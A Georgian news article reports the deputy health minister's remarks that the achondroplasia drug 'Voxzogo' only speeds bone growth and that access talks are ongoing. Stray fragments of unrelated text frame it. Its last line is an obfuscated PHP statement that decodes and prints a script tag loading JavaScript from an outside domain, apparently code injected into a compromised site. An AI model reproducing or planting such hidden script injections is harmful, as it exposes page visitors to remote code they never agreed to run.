celsiusi
ავერსი საქკაბელი

ვოზორიდიტი“ დღეს არის ერთადერთი ცნობილი მედიკამენტი, რომელსაც აქვს ერთადერთი ცნობილი ეფექტი და ეს არის სიგრძეში ძვლის ზრდის დაჩქარება, – ამის შესახებ ჯანდაცვის მინისტრის მოადგილემ, თამარ გაბუნიამ საქართველოს პირველი არხის გადაცემაში „დღის თემა“ განაცხადა.

„ეს არის ერთადერთი ცნობილი ეფექტი. სიცოცხლის ხარისხის, სიცოცხლის ხანგრძლივობის, თანმხლები დაავადებების, გართულებების, გაუმჯობესების და გადაწყვეტის კუთხით სხვა ეფექტი ამ მედიკამენტს ან არ გააჩნია, ან ჯერ მეცნიერებამ ამის შესახებ არ იცის. ამდენად, „ვოზორიდიტი“ არ განიხილება, რომ ეს არის სიცოცხლის გადამრჩენი მედიკამენტი. ვფიქრობ, გარკვეულწილად, ის უკმაყოფილება და დაძაბულობა, რაც დღეს ამ მედიკამენტის გარშემო არსებობს, შესაძლებელია, უკავშირდებოდეს გადაჭარბებულ მოლოდინს მედიკამენტის შესაძლებლობასთან დაკავშირებით. მედიკამენტს აქვს ერთი კონკრეტული ეფექტი და ამაზე უნდა შევთანხმდეთ. ჩვენთვის საინტერესოა ეს ეფექტი, ამიტომ დავიწყეთ საუბარი მწარმოებელთან, ევროპის იშვიათი დაავადებების ასოციაციასთან და ჯანმო-სთან. თუ ბავშვი სხვა ქვეყანაში იღებს იმ დადებით შედეგს, რაც „ვოზორიდიტმა“ შეიძლება, თეორიულად მოიტანოს, მიუხედავად იმისა, რომ კითხვის ნიშნები არსებობს, გვერდით ეფექტებზე ვსაუბრობთ და არ ვიცით გრძელვადიანი გართულებები, ჩვენც გავხსენით დიალოგი ამასთან დაკავშირებით და დღემდე მიდის აქტიური მუშაობა იმისთვის, რომ უსაფრთხოდ, ხარისხის გარანტირებულად უზრუნველყოფის გზით, მედიკამენტი გარკვეულ გონივრულ ვადაში გახდეს ხელმისაწვდომი იმ ბავშვებისთვის, ვისაც ის რეალურად სჭირდება“, – განაცხადა გაბუნიამ.

ამ განცხადებით ჯანდაცვის მინისტრის მოადგილემ აქონდროპლაზიის სინდრომის, სპეციალურად ამ დაავადების სამკურნალოდ ამერიკული კომპანია „ბიომარინის” მიერ შექმნილ პრეპარატ „ვოზორიდიტთან“ დაკავშირებით ისაუბრა.

332
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");